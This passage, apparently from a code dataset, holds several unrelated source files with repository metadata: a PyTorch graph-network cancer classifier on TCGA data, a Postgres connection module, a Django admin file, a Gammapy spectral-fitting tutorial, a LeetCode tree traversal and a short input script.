self.bn2 = nn.BatchNorm1d(num_features=8)
self.drop2 = torch.nn.Dropout(0.4)
def forward(self, adj, expr, batch_size):
outs = []
for i in range(batch_size):
outs.append(self.gcn(expr[i,:], adj[i,:]).view(1,adj.size(1)))
concat_gcn = outs[0]
for i in range(1,batch_size):
concat_gcn = torch.cat([concat_gcn, outs[i]], dim=0)
output = self.drop1(F.relu(self.bn1(self.fc1(concat_gcn))))
output = self.drop2(F.relu(self.bn2(self.fc2(output))))
output = self.fc3(output)
return output
ppi_adj_matrix = pickle.load(open("DATASET/Adj.pickle", "rb"))
#adj -> Adjacency matrix (N by N ---> N is the number of nodes)
#expr -> Features (Expression) matrix (N by 1 ---> 1 is for gene expression value for each protein)
tcga_clinical_dataframe = pickle.load(open("DATASET/TCGA_clinical_dataframe.pickle","rb"))
classes = {"adrenal gland":0, "bladder":1, "breast":2, "GYN":3, "bile duct":4, "CRC":5, "bone marrow":6, "esophagus":7, "brain":8, "head and neck":9, "Kidney":10, "liver":11, "Lung":12, "pleura":13, "pancreatic":14, "male reproductive system":15, "other":16, "Melanoma":17, "stomach":18, "thyroid":19, "thymus":20}
which_clinicals = ['cancer_class']
tcga_clinical_dataframe = tcga_clinical_dataframe[which_clinicals]
for cancer_class in classes:
print(">>>>>>" + cancer_class)
folds_accuracy = []
folds_roc_auc = []
folds_PR_auc = []
replace_statement = {}
for cl in classes:
if(cl != cancer_class):
replace_statement[cl] = 0
else:
replace_statement[cl] = 1
specific_cancer_patients = tcga_clinical_dataframe[tcga_clinical_dataframe["cancer_class"] == cancer_class]
specific_cancer_patients = specific_cancer_patients.replace({'cancer_class': replace_statement})
other_cancer_patients = tcga_clinical_dataframe[tcga_clinical_dataframe["cancer_class"] != cancer_class]
other_cancer_patients = shuffle(other_cancer_patients).sample(n = len(specific_cancer_patients))
other_cancer_patients = other_cancer_patients.replace({'cancer_class': replace_statement})
K = 10 #Kfold (number of parts = K)
kf_other = KFold(n_splits = K, shuffle = True)
kf_specific = KFold(n_splits = K, shuffle = True)
parts_specific = kf_specific.split(specific_cancer_patients)
parts_other = kf_other.split(other_cancer_patients)
indices_specific = next(parts_specific, None)
indices_other = next(parts_other, None)
fold = 1
while(indices_specific):
#Define the model
model = ExprGCNPPI()
# Mean Squared Error
criterion = torch.nn.CrossEntropyLoss()
# Stochastic Gradient Descent
optimizer = torch.optim.SGD(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1.0, gamma=0.95)
batch_size = 20
print("Shuffled Epoch (20): ", end="")
for shuffled_epoch in range(20):
if(shuffled_epoch == 19):
print((shuffled_epoch+1))
else:
print((shuffled_epoch+1), end=", ")
training = specific_cancer_patients.iloc[indices_specific[0]]
training_other = other_cancer_patients.iloc[indices_other[0]]
training = shuffle(training.append(training_other))
Y = training[['cancer_class']].values
Y = Variable(torch.LongTensor(Y.flatten()), requires_grad=False)
training = training.index
for epoch in range(50):
for index in range(0, len(training), batch_size):
y = Y[index : index + batch_size]
batch_X = []
kk = 0
for patient in training[index : index + batch_size]:
kk += 1
p_data = pickle.load(open("DATASET/ExpressionInputs/" + patient + "_expressions.pickle", "rb"))
batch_X.append(p_data)
X = np.asarray(batch_X)
adj = np.array([ppi_adj_matrix]*batch_size)
adj = adj.astype(np.float32)
adj = torch.FloatTensor(adj)
X = X.astype(np.float32)
X = torch.FloatTensor(X)
X = X.view(X.size(0), X.size(1), 1)
optimizer.zero_grad()
Y_hat = model(adj, X, kk)
loss = criterion(Y_hat, y)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)
optimizer.step()
test = specific_cancer_patients.iloc[indices_specific[1]]
test_other = other_cancer_patients.iloc[indices_other[1]]
test = shuffle(test.append(test_other))
Y_test = test[['cancer_class']].values
Y_test = Variable(torch.LongTensor(Y_test.flatten()), requires_grad=False)
test = test.index
avg_acc = 0
isFirstTime = True
output_predicted = ""
ii = 0
for index in range(0, len(training), batch_size):
y = Y_test[index : index + batch_size]
test_list = []
kk = 0
for patient in test[index : index + batch_size]:
kk += 1
p_data = pickle.load(open("DATASET/ExpressionInputs/" + patient + "_expressions.pickle", "rb"))
test_list.append(p_data)
#test_list = torch.FloatTensor(test_list)
if(len(test_list) <= 1):
break
X_test = np.asarray(test_list)
adj = np.array([ppi_adj_matrix]*batch_size)
adj = adj.astype(np.float32)
adj = torch.FloatTensor(adj)
X_test = X_test.astype(np.float32)
X_test = torch.FloatTensor(X_test)
X_test = X_test.view(X_test.size(0), X_test.size(1), 1)
test_batch_Y_hat = model.forward(adj, X_test, kk)
if(isFirstTime):
output_predicted = test_batch_Y_hat
isFirstTime = False
else:
output_predicted = torch.cat((output_predicted, test_batch_Y_hat), 0)
dummy, preds_test = torch.max (test_batch_Y_hat, dim = 1)
accuracy_test = (preds_test == y).long().sum().float() / preds_test.size()[0]
avg_acc += accuracy_test
ii += 1
avg_acc = avg_acc / ii
Y_prediction = torch.softmax(output_predicted, dim=1)
Y_prediction = np.array(Y_prediction.tolist())
Y_real = np.array([[1,0] if y == 0 else [0,1] for y in Y_test])
fpr = dict()
tpr = dict()
precision = dict()
recall = dict()
roc_auc = dict()
PR_auc = dict()
for i in range(2):
fpr[i], tpr[i], _ = roc_curve(Y_real[:, i], Y_prediction[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
precision[i], recall[i], _ = precision_recall_curve(Y_real[:, i], Y_prediction[:, i])
PR_auc[i] = auc(recall[i], precision[i])
print("Fold " + str(fold) + " Accuracy: " + str(avg_acc))
print("Fold " + str(fold) + " ROC AUC: " + str(roc_auc[1]))
print("Fold " + str(fold) + " PR AUC: " + str(PR_auc[1]))
fold += 1
folds_accuracy.append(avg_acc)
folds_roc_auc.append(roc_auc[1])
folds_PR_auc.append(PR_auc[1])
indices_specific = next(parts_specific, None)
indices_other = next(parts_other, None)
if not os.path.exists('RESULTS/ExprGCNPPIResults'):
os.makedirs('RESULTS/ExprGCNPPIResults')
pickle.dump(folds_accuracy, open("RESULTS/ExprGCNPPIResults/" + cancer_class + "_Accuracy.pickle","wb"))
pickle.dump(folds_roc_auc, open("RESULTS/ExprGCNPPIResults/" + cancer_class + "_ROC_AUC.pickle","wb"))
pickle.dump(folds_PR_auc, open("RESULTS/ExprGCNPPIResults/" + cancer_class + "_PR_AUC.pickle","wb"))
#Predict Metastasis (Stage IV) or not (Stages I, II, and III)
#tcga_clinical_dataframe[tcga_clinical_dataframe['stage'] == 'Stage IVA']
tcga_clinical_dataframe = pickle.load(open("DATASET/TCGA_clinical_dataframe.pickle","rb"))
which_clinicals = ['stage']
tcga_clinical_dataframe = tcga_clinical_dataframe[which_clinicals]
replace_statement = {}
metastasis_list = ['Stage IV','Stage IVA','Stage IVB','Stage IVC']
other_list = ['Stage I','Stage IA','Stage IB','Stage II','Stage IIA','Stage IIB','Stage IIC','Stage III','Stage IIIA','Stage IIIB','Stage IIIC']
#Metastasis Stage
for m in metastasis_list:
replace_statement[m] = 1
#Non-metastasis Stage
for o in other_list:
replace_statement[o] = 0
metastasis_patients = tcga_clinical_dataframe[tcga_clinical_dataframe["stage"].isin(metastasis_list)]
metastasis_patients = metastasis_patients.replace({'stage': replace_statement})
other_patients = tcga_clinical_dataframe[tcga_clinical_dataframe["stage"].isin(other_list)]
other_patients = other_patients.replace({'stage': replace_statement})
start_and_end_for_other = [0,793,1586,2379,3172,3965,4758,5554]
for i in range(7):
print("PART: " + str(i))
selected_other_patients = other_patients[start_and_end_for_other[i]:start_and_end_for_other[i+1]]
folds_accuracy = []
K = 10 #Kfold (number of parts = K)
kf_other = KFold(n_splits = K, shuffle = True)
kf_metastasis = KFold(n_splits = K, shuffle = True)
parts_metastasis = kf_metastasis.split(metastasis_patients)
parts_other = kf_other.split(selected_other_patients)
indices_metastasis = next(parts_metastasis, None)
indices_other = next(parts_other, None)
fold_number = 1
while(indices_metastasis):
model = ExprGCNPPI()
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1.0, gamma=0.95)
batch_size = 20
print("Shuffled Epoch (20): ", end="")
for shuffled_epoch in range(20):
if(shuffled_epoch == 19):
print((shuffled_epoch+1))
else:
print((shuffled_epoch+1), end=", ")
training = metastasis_patients.iloc[indices_metastasis[0]]
training_other = selected_other_patients.iloc[indices_other[0]]
training = shuffle(training.append(training_other))
Y = training[['stage']].values
Y = Variable(torch.LongTensor(Y.flatten()), requires_grad=False)
training = training.index
for epoch in range(50):
for index in range(0, len(training), batch_size):
y = Y[index : index + batch_size]
batch_X = []
kk = 0
for patient in training[index : index + batch_size]:
kk += 1
p_data = pickle.load(open("DATASET/ExpressionInputs/" + patient + "_expressions.pickle", "rb"))
batch_X.append(p_data)
X = np.asarray(batch_X)
adj = np.array([ppi_adj_matrix]*batch_size)
adj = adj.astype(np.float32)
adj = torch.FloatTensor(adj)
X = X.astype(np.float32)
X = torch.FloatTensor(X)
X = X.view(X.size(0), X.size(1), 1)
optimizer.zero_grad()
Y_hat = model(adj, X, kk)
loss = criterion(Y_hat, y)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)
optimizer.step()
test = metastasis_patients.iloc[indices_metastasis[1]]
test_other = selected_other_patients.iloc[indices_other[1]]
test = shuffle(test.append(test_other))
Y_test = test[['stage']].values
Y_test = Variable(torch.LongTensor(Y_test.flatten()), requires_grad=False)
test = test.index
avg_acc = 0
ii = 0
for index in range(0, len(training), batch_size):
y = Y_test[index : index + batch_size]
test_list = []
kk = 0
for patient in test[index : index + batch_size]:
kk += 1
p_data = pickle.load(open("DATASET/ExpressionInputs/" + patient + "_expressions.pickle", "rb"))
test_list.append(p_data)
if(len(test_list) <= 1):
break
X_test = np.asarray(test_list)
adj = np.array([ppi_adj_matrix]*batch_size)
adj = adj.astype(np.float32)
adj = torch.FloatTensor(adj)
X_test = X_test.astype(np.float32)
X_test = torch.FloatTensor(X_test)
X_test = X_test.view(X_test.size(0), X_test.size(1), 1)
test_batch_Y_hat = model.forward(adj, X_test, kk)
dummy, preds_test = torch.max (test_batch_Y_hat, dim = 1)
accuracy_test = (preds_test == y).long().sum().float() / preds_test.size()[0]
avg_acc += accuracy_test
ii += 1
avg_acc = avg_acc / ii
print("Fold: " + str(fold_number) + " ACC: " + str(avg_acc))
fold_number += 1
folds_accuracy.append(avg_acc)
indices_metastasis = next(parts_metastasis, None)
indices_other = next(parts_other, None)
if not os.path.exists('RESULTS/ExprGCNPPI-StagePrediction'):
os.makedirs('RESULTS/ExprGCNPPI-StagePrediction')
pickle.dump(folds_accuracy, open("RESULTS/ExprGCNPPI-StagePrediction/Part" + str(i) + "_folds_accuracy.pickle","wb"))
|
[
"noreply@github.com"
] |
sabdollahi.noreply@github.com
|
2261ff42ef53ff6f7e29b4575773ca2548c73283
|
bf348f0a5dbde6052f0cf6e4c9e570bd07c13533
|
/src/ManageDatabases/SettingDatabase.py
|
ef2a44a44127f3c18a555bccf54ff38bc30b8f18
|
[] |
no_license
|
PaoloGraziani/webAppFlask
|
7b114c59108bdfff9d9f768325c3ebcf3b3b90f0
|
7808c276645215f121def4850ada251f708d41ee
|
refs/heads/main
| 2023-07-25T01:33:20.566515
| 2021-09-09T17:28:27
| 2021-09-09T17:28:27
| 383,222,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
import psycopg2
'''
Inizializzazione DATABASE di Autenticazione
'''
Authentication_HOST = "localhost"
Authentication_DATABASE = "AuthDATA"
Authentication_USERNAME = "postgres"
Authentication_PASSWORD = "postgres"
'''
Inizializzazione DATABASE di Applicazione
'''
Application_HOST = "localhost"
Application_DATABASE = "DbWebApp"
Application_USERNAME = "postgres"
Application_PASSWORD = "postgres"
def closeCursor(cur):
cur.close()
def connectDatabase(host, database, username, password):
newConnection = psycopg2.connect(host=host, database=database, user=username, password=password)
return newConnection
def closeConnection(conn):
conn.close()
|
[
"paolo.graziani@studenti.univr.it"
] |
paolo.graziani@studenti.univr.it
|
77d1a721f114372350581d34c782000e12e28616
|
3806175fcbc4a386bea986dfb97a362fb983862f
|
/blog/admin.py
|
b067606aa8033d6bc2cc3041330821fe31e22b76
|
[] |
no_license
|
Kiki-demo/MyBlog
|
c53cbcbae1b3280da74d1d349ff6cc717a79b332
|
51554c92ac5435a7bc2222deedf7aa397c0bd73a
|
refs/heads/master
| 2023-03-28T06:08:10.164174
| 2019-08-02T10:25:20
| 2019-08-02T10:25:20
| 199,954,653
| 0
| 0
| null | 2021-03-29T20:10:39
| 2019-08-01T01:34:14
|
CSS
|
GB18030
|
Python
| false
| false
| 441
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
# Register your models here.
from .models import Category, Tag, Post
class PostAdmin(admin.ModelAdmin):
list_display = ['title', 'created_time', 'modified_time', 'category', 'author']
# 把新增的 PostAdmin 也注册进来
admin.site.register(Post, PostAdmin)
admin.site.register(Category)
admin.site.register(Tag)
|
[
"kiki.zhang@dewav.com"
] |
kiki.zhang@dewav.com
|
a4d250d72f94be4c124927e70b0c139ad9f85f9d
|
f8fbf0b0cc919d7d4d7c79532cc5434552d75eb8
|
/docs/0.18.1/_static/notebooks/modeling.py
|
a5bdb272476813045d22aca2f06eddfb47942841
|
[] |
no_license
|
adonath/gammapy-docs
|
ae8571c6aa76d231ac54c93fb3c8968f9f79993b
|
32b605d623abdcd2e82c30bcbf07ef30d259783a
|
refs/heads/main
| 2023-02-25T05:24:53.211005
| 2022-10-13T00:09:12
| 2022-10-13T00:11:33
| 550,476,516
| 0
| 0
| null | 2022-10-12T20:45:50
| 2022-10-12T20:45:49
| null |
UTF-8
|
Python
| false
| false
| 14,807
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Modeling and fitting
#
#
# ## Prerequisites
#
# - Knowledge of spectral analysis to produce 1D On-Off datasets, [see the following tutorial](spectrum_analysis.ipynb)
# - Reading of pre-computed datasets [see the MWL tutorial](analysis_mwl.ipynb)
# - General knowledge on statistics and optimization methods
#
# ## Proposed approach
#
# This is a hands-on tutorial to `~gammapy.modeling`, showing how the model, dataset and fit classes work together. As an example we are going to work with HESS data of the Crab Nebula and show in particular how to :
# - perform a spectral analysis
# - use different fitting backends
# - acces covariance matrix informations and parameter errors
# - compute likelihood profile
# - compute confidence contours
#
# See also: [Models gallery tutorial](models.ipynb) and `docs/modeling/index.rst`.
#
#
# ## The setup
# In[ ]:
import numpy as np
from astropy import units as u
import matplotlib.pyplot as plt
import scipy.stats as st
from gammapy.modeling import Fit
from gammapy.datasets import Datasets, SpectrumDatasetOnOff
from gammapy.modeling.models import LogParabolaSpectralModel, SkyModel
from gammapy.visualization.utils import plot_contour_line
from itertools import combinations
# ## Model and dataset
#
# First we define the source model, here we need only a spectral model for which we choose a log-parabola
# In[ ]:
crab_spectrum = LogParabolaSpectralModel(
amplitude=1e-11 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
alpha=2.3,
beta=0.2,
)
crab_spectrum.alpha.max = 3
crab_spectrum.alpha.min = 1
crab_model = SkyModel(spectral_model=crab_spectrum, name="crab")
# The data and background are read from pre-computed ON/OFF datasets of HESS observations, for simplicity we stack them together.
# Then we set the model and fit range to the resulting dataset.
# In[ ]:
datasets = []
for obs_id in [23523, 23526]:
dataset = SpectrumDatasetOnOff.from_ogip_files(
f"$GAMMAPY_DATA/joint-crab/spectra/hess/pha_obs{obs_id}.fits"
)
datasets.append(dataset)
dataset_hess = Datasets(datasets).stack_reduce(name="HESS")
# Set model and fit range
dataset_hess.models = crab_model
e_min = 0.66 * u.TeV
e_max = 30 * u.TeV
dataset_hess.mask_fit = dataset_hess.counts.geom.energy_mask(e_min, e_max)
# ## Fitting options
#
#
#
# First let's create a `Fit` instance:
# In[ ]:
fit = Fit([dataset_hess], store_trace=True)
# By default the fit is performed using MINUIT, you can select alternative optimizers and set their option using the `optimize_opts` argument of the `Fit.run()` method. In addition we have specified to store the trace of parameter values of the fit.
#
# Note that, for now, covaraince matrix and errors are computed only for the fitting with MINUIT. However depending on the problem other optimizers can better perform, so somethimes it can be usefull to run a pre-fit with alternative optimization methods.
#
# For the "scipy" backend the available options are desribed in detail here:
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html
# In[ ]:
get_ipython().run_cell_magic('time', '', 'scipy_opts = {"method": "L-BFGS-B", "options": {"ftol": 1e-4, "gtol": 1e-05}}\nresult_scipy = fit.run(backend="scipy", optimize_opts=scipy_opts)')
# For the "sherpa" backend you can choose the optimization algorithm between method = {"simplex", "levmar", "moncar", "gridsearch"}.
# Those methods are described and compared in detail on http://cxc.cfa.harvard.edu/sherpa/methods/index.html.
# The available options of the optimization methods are described on the following page https://cxc.cfa.harvard.edu/sherpa/methods/opt_methods.html
# In[ ]:
get_ipython().run_cell_magic('time', '', 'sherpa_opts = {"method": "simplex", "ftol": 1e-3, "maxfev": int(1e4)}\nresults_simplex = fit.run(backend="sherpa", optimize_opts=sherpa_opts)')
# For the "minuit" backend see https://iminuit.readthedocs.io/en/latest/reference.html for a detailed description of the available options. If there is an entry ‘migrad_opts’, those options will be passed to [iminuit.Minuit.migrad](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.migrad). Additionnaly you can set the fit tolerance using the [tol](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.tol
# ) option. The minimization will stop when the estimated distance to the minimum is less than 0.001*tol (by default tol=0.1). The [strategy](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.strategy) option change the speed and accuracy of the optimizer: 0 fast, 1 default, 2 slow but accurate. If you want more reliable error estimates, you should run the final fit with strategy 2.
#
# In[ ]:
get_ipython().run_cell_magic('time', '', 'minuit_opts = {"tol": 0.001, "strategy": 1}\nresult_minuit = fit.run(backend="minuit", optimize_opts=minuit_opts)')
# ## Fit quality assessment
#
# There are various ways to check the convergence and quality of a fit. Among them:
#
# - Refer to the automatically-generated results dictionary
# In[ ]:
print(result_scipy)
# In[ ]:
print(results_simplex)
# In[ ]:
print(result_minuit)
# - Check the trace of the fit e.g. in case the fit did not converge properly
# In[ ]:
result_minuit.trace
# - Check that the fitted values and errors for all parameters are reasonable, and no fitted parameter value is "too close" - or even outside - its allowed min-max range
# In[ ]:
result_minuit.parameters.to_table()
# - Plot fit statistic profiles for all fitted prameters, using `~gammapy.modeling.Fit.stat_profile()`. For a good fit and error estimate each profile should be parabolic
# In[ ]:
total_stat = result_minuit.total_stat
for par in dataset_hess.models.parameters:
if par.frozen is False:
profile = fit.stat_profile(parameter=par)
plt.plot(
profile[f"{par.name}_scan"], profile["stat_scan"] - total_stat
)
plt.xlabel(f"{par.unit}")
plt.ylabel("Delta TS")
plt.title(f"{par.name}: {par.value} +- {par.error}")
plt.show()
plt.close()
# - Inspect model residuals. Those can always be accessed using `~Dataset.residuals()`, that will return an array in case a the fitted `Dataset` is a `SpectrumDataset` and a full cube in case of a `MapDataset`. For more details, we refer here to the dedicated fitting tutorials: [analysis_3d.ipynb](analysis_3d.ipynb) (for `MapDataset` fitting) and [spectrum_analysis.ipynb](spectrum_analysis.ipynb) (for `SpectrumDataset` fitting).
# ## Covariance and parameters errors
#
# After the fit the covariance matrix is attached to the model. You can get the error on a specific parameter by accessing the `.error` attribute:
# In[ ]:
crab_model.spectral_model.alpha.error
# As an example, this step is needed to produce a butterfly plot showing the envelope of the model taking into account parameter uncertainties.
# In[ ]:
energy_range = [1, 10] * u.TeV
crab_spectrum.plot(energy_range=energy_range, energy_power=2)
ax = crab_spectrum.plot_error(energy_range=energy_range, energy_power=2)
# ## Confidence contours
#
#
# In most studies, one wishes to estimate parameters distribution using observed sample data.
# A 1-dimensional confidence interval gives an estimated range of values which is likely to include an unknown parameter.
# A confidence contour is a 2-dimensional generalization of a confidence interval, often represented as an ellipsoid around the best-fit value.
#
# Gammapy offers two ways of computing confidence contours, in the dedicated methods `Fit.minos_contour()` and `Fit.stat_profile()`. In the following sections we will describe them.
# An important point to keep in mind is: *what does a $N\sigma$ confidence contour really mean?* The answer is it represents the points of the parameter space for which the model likelihood is $N\sigma$ above the minimum. But one always has to keep in mind that **1 standard deviation in two dimensions has a smaller coverage probability than 68%**, and similarly for all other levels. In particular, in 2-dimensions the probability enclosed by the $N\sigma$ confidence contour is $P(N)=1-e^{-N^2/2}$.
# ### Computing contours using `Fit.minos_contour()`
# After the fit, MINUIT offers the possibility to compute the confidence confours.
# gammapy provides an interface to this functionnality throught the `Fit` object using the `minos_contour` method.
# Here we defined a function to automatize the contour production for the differents parameterer and confidence levels (expressed in term of sigma):
# In[ ]:
def make_contours(fit, result, npoints, sigmas):
cts_sigma = []
for sigma in sigmas:
contours = dict()
for par_1, par_2 in combinations(["alpha", "beta", "amplitude"], r=2):
contour = fit.minos_contour(
result.parameters[par_1],
result.parameters[par_2],
numpoints=npoints,
sigma=sigma,
)
contours[f"contour_{par_1}_{par_2}"] = {
par_1: contour[par_1].tolist(),
par_2: contour[par_2].tolist(),
}
cts_sigma.append(contours)
return cts_sigma
# Now we can compute few contours.
# In[ ]:
get_ipython().run_cell_magic('time', '', 'sigma = [1, 2]\ncts_sigma = make_contours(fit, result_minuit, 10, sigma)')
# Then we prepare some aliases and annotations in order to make the plotting nicer.
# In[ ]:
pars = {
"phi": r"$\phi_0 \,/\,(10^{-11}\,{\rm TeV}^{-1} \, {\rm cm}^{-2} {\rm s}^{-1})$",
"alpha": r"$\alpha$",
"beta": r"$\beta$",
}
panels = [
{
"x": "alpha",
"y": "phi",
"cx": (lambda ct: ct["contour_alpha_amplitude"]["alpha"]),
"cy": (
lambda ct: np.array(1e11)
* ct["contour_alpha_amplitude"]["amplitude"]
),
},
{
"x": "beta",
"y": "phi",
"cx": (lambda ct: ct["contour_beta_amplitude"]["beta"]),
"cy": (
lambda ct: np.array(1e11)
* ct["contour_beta_amplitude"]["amplitude"]
),
},
{
"x": "alpha",
"y": "beta",
"cx": (lambda ct: ct["contour_alpha_beta"]["alpha"]),
"cy": (lambda ct: ct["contour_alpha_beta"]["beta"]),
},
]
# Finally we produce the confidence contours figures.
# In[ ]:
fig, axes = plt.subplots(1, 3, figsize=(16, 5))
colors = ["m", "b", "c"]
for p, ax in zip(panels, axes):
xlabel = pars[p["x"]]
ylabel = pars[p["y"]]
for ks in range(len(cts_sigma)):
plot_contour_line(
ax,
p["cx"](cts_sigma[ks]),
p["cy"](cts_sigma[ks]),
lw=2.5,
color=colors[ks],
label=f"{sigma[ks]}" + r"$\sigma$",
)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
plt.legend()
plt.tight_layout()
# ### Computing contours using `Fit.stat_surface()`
# This alternative method for the computation of confidence contours, although more time consuming than `Fit.minos_contour()`, is expected to be more stable. It consists of a generalization of `Fit.stat_profile()` to a 2-dimensional parameter space. The algorithm is very simple:
# - First, passing two arrays of parameters values, a 2-dimensional discrete parameter space is defined;
# - For each node of the parameter space, the two parameters of interest are frozen. This way, a likelihood value ($-2\mathrm{ln}\,\mathcal{L}$, actually) is computed, by either freezing (default) or fitting all nuisance parameters;
# - Finally, a 2-dimensional surface of $-2\mathrm{ln}(\mathcal{L})$ values is returned.
# Using that surface, one can easily compute a surface of $TS = -2\Delta\mathrm{ln}(\mathcal{L})$ and compute confidence contours.
#
# Let's see it step by step.
# First of all, we can notice that this method is "backend-agnostic", meaning that it can be run with MINUIT, sherpa or scipy as fitting tools. Here we will stick with MINUIT, which is the default choice:
# In[ ]:
optimize_opts = {"backend": "minuit", "print_level": 0}
# As an example, we can compute the confidence contour for the `alpha` and `beta` parameters of the `dataset_hess`. Here we define the parameter space:
# In[ ]:
result = result_minuit
par_1 = result.parameters["alpha"]
par_2 = result.parameters["beta"]
x = par_1
y = par_2
x_values = np.linspace(1.55, 2.7, 20)
y_values = np.linspace(-0.05, 0.55, 20)
# Then we run the algorithm, by choosing `reoptimize=False` for the sake of time saving. In real life applications, we strongly recommend to use `reoptimize=True`, so that all free nuisance parameters will be fit at each grid node. This is the correct way, statistically speaking, of computing confidence contours, but is expected to be time consuming.
# In[ ]:
stat_surface = fit.stat_surface(
x, y, x_values, y_values, reoptimize=False, **optimize_opts
)
# In order to easily inspect the results, we can convert the $-2\mathrm{ln}(\mathcal{L})$ surface to a surface of statistical significance (in units of Gaussian standard deviations from the surface minimum):
# In[ ]:
# Compute TS
TS = stat_surface["stat_scan"] - result.total_stat
# In[ ]:
# Compute the corresponding statistical significance surface
gaussian_sigmas = np.sqrt(TS.T)
# Notice that, as explained before, $1\sigma$ contour obtained this way will not contain 68% of the probability, but rather
# In[ ]:
# Compute the corresponding statistical significance surface
# p_value = 1 - st.chi2(df=1).cdf(TS)
# gaussian_sigmas = st.norm.isf(p_value / 2).T
# Finally, we can plot the surface values together with contours:
# In[ ]:
fig, ax = plt.subplots(figsize=(8, 6))
# We choose to plot 1 and 2 sigma confidence contours
levels = [1, 2]
contours = plt.contour(gaussian_sigmas, levels=levels, colors="white")
plt.clabel(contours, fmt="%.0f$\,\sigma$", inline=3, fontsize=15)
im = plt.imshow(
gaussian_sigmas,
extent=[0, len(x_values) - 1, 0, len(y_values) - 1],
origin="lower",
)
fig.colorbar(im)
plt.xticks(range(len(x_values)), np.around(x_values, decimals=2), rotation=45)
plt.yticks(range(len(y_values)), np.around(y_values, decimals=2));
# Note that, if computed with `reoptimize=True`, this plot would be completely consistent with the third panel of the plot produced with `Fit.minos_contour` (try!).
# Finally, it is always remember that confidence contours are approximations. In particular, when the parameter range boundaries are close to the contours lines, it is expected that the statistical meaning of the countours is not well defined. That's why we advise to always choose a parameter space that com contain the contours you're interested in.
# In[ ]:
|
[
"axel.donath@mpi-hd.mpg.de"
] |
axel.donath@mpi-hd.mpg.de
|
06d3b8b17c46a0ae3faf7387123f73c73bea8d78
|
4766d241bbc736e070f79a6ae6a919a8b8bb442d
|
/20200215Python-China/0094. Binary Tree Inorder Traversal.py
|
08893a77b8777c433e17edf90f755b8b4b58c958
|
[] |
no_license
|
yangzongwu/leetcode
|
f7a747668b0b5606050e8a8778cc25902dd9509b
|
01f2edd79a1e922bfefecad69e5f2e1ff3a479e5
|
refs/heads/master
| 2021-07-08T06:45:16.218954
| 2020-07-18T10:20:24
| 2020-07-18T10:20:24
| 165,957,437
| 10
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
'''
Given a binary tree, return the inorder traversal of its nodes' values.
Example:
Input: [1,null,2,3]
1
\
2
/
3
Output: [1,3,2]
Follow up: Recursive solution is trivial, could you do it iteratively?
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def inorderTraversal(self, root: TreeNode) -> List[int]:
rep=[]
self.getInOrderTra(root,rep)
return rep
def getInOrderTra(self,root,rep):
if not root:
return
self.getInOrderTra(root.left,rep)
rep.append(root.val)
self.getInOrderTra(root.right,rep)
|
[
"noreply@github.com"
] |
yangzongwu.noreply@github.com
|
4c9df0aef998f4392465ebfdb2da7513c530cef6
|
5cb820487419a5e06345590f5f563a09e1949b42
|
/F0003a.py
|
03fccecf0051f01d2f97c39f5355f20102edf0fe
|
[] |
no_license
|
loczylevi/-f0003
|
a84921d0d07dcc3e27e48b18f1e031d9f3dc73e8
|
12ed7125fd0700d8b777c0985c70144335007423
|
refs/heads/master
| 2023-01-11T23:01:45.050216
| 2020-11-08T10:30:43
| 2020-11-08T10:30:43
| 310,523,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
vezetéknév = input('Mi a vezetékneved?')
keresztnév = input('MI a keresztneved?')
print('A te neved ', vezetéknév, keresztnév,)
|
[
"loczy2003@gmail.com"
] |
loczy2003@gmail.com
|
b668d29096563112db9bbe2fb4adc91d5dcac26e
|
34354acd20aba20dc78909edb80376d82ee31efb
|
/partsix/TestQueue.py
|
f775be4e01a141aeb458bf93d9d1a12a482c8fe5
|
[] |
no_license
|
yzw1102/study_python
|
40de23db9f4f5270d7b8fae0739148e50e4792d7
|
d8cc929475827925d9135167b5afd5a47232efd0
|
refs/heads/master
| 2020-04-13T10:00:16.405293
| 2019-01-09T07:30:22
| 2019-01-09T07:30:22
| 163,126,969
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
from queue import Queue
from threading import Thread
import time
isRead = True
def write(q):
for value in ['ye1','ye2','ye3']:
print('the value write in queue is : {0} '.format(value))
q.put(value)
time.sleep(1)
def read(q):
while isRead:
value = q.get(True)
print('the value get from queue is : {0}'.format(value))
if __name__ == '__main__':
q = Queue()
t1 = Thread(target = write,args = (q,))
t2 = Thread(target = read, args = (q,))
t1.start()
t2.start()
|
[
"ye19861102"
] |
ye19861102
|
e5fefc6b8e0ec0d00e467d6808038193d92e8aa7
|
683b73e0c95c755a08e019529aed3ff1a8eb30f8
|
/machina/apps/forum_moderation/__init__.py
|
f1911a14dbd6195e896b647fa949fa08a0c6abce
|
[
"BSD-3-Clause"
] |
permissive
|
DrJackilD/django-machina
|
b3a7be9da22afd457162e0f5a147a7ed5802ade4
|
76858921f2cd247f3c1faf4dc0d9a85ea99be3e1
|
refs/heads/master
| 2020-12-26T08:19:09.838794
| 2016-03-11T03:55:25
| 2016-03-11T03:55:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
# -*- coding: utf-8 -*-
# Standard library imports
# Third party imports
# Local application / specific library imports
default_app_config = 'machina.apps.forum_moderation.registry_config.ModerationRegistryConfig'
|
[
"morgan.aubert@zoho.com"
] |
morgan.aubert@zoho.com
|
818def7bc87a5c0bcf797c372ee7fd1af118ce87
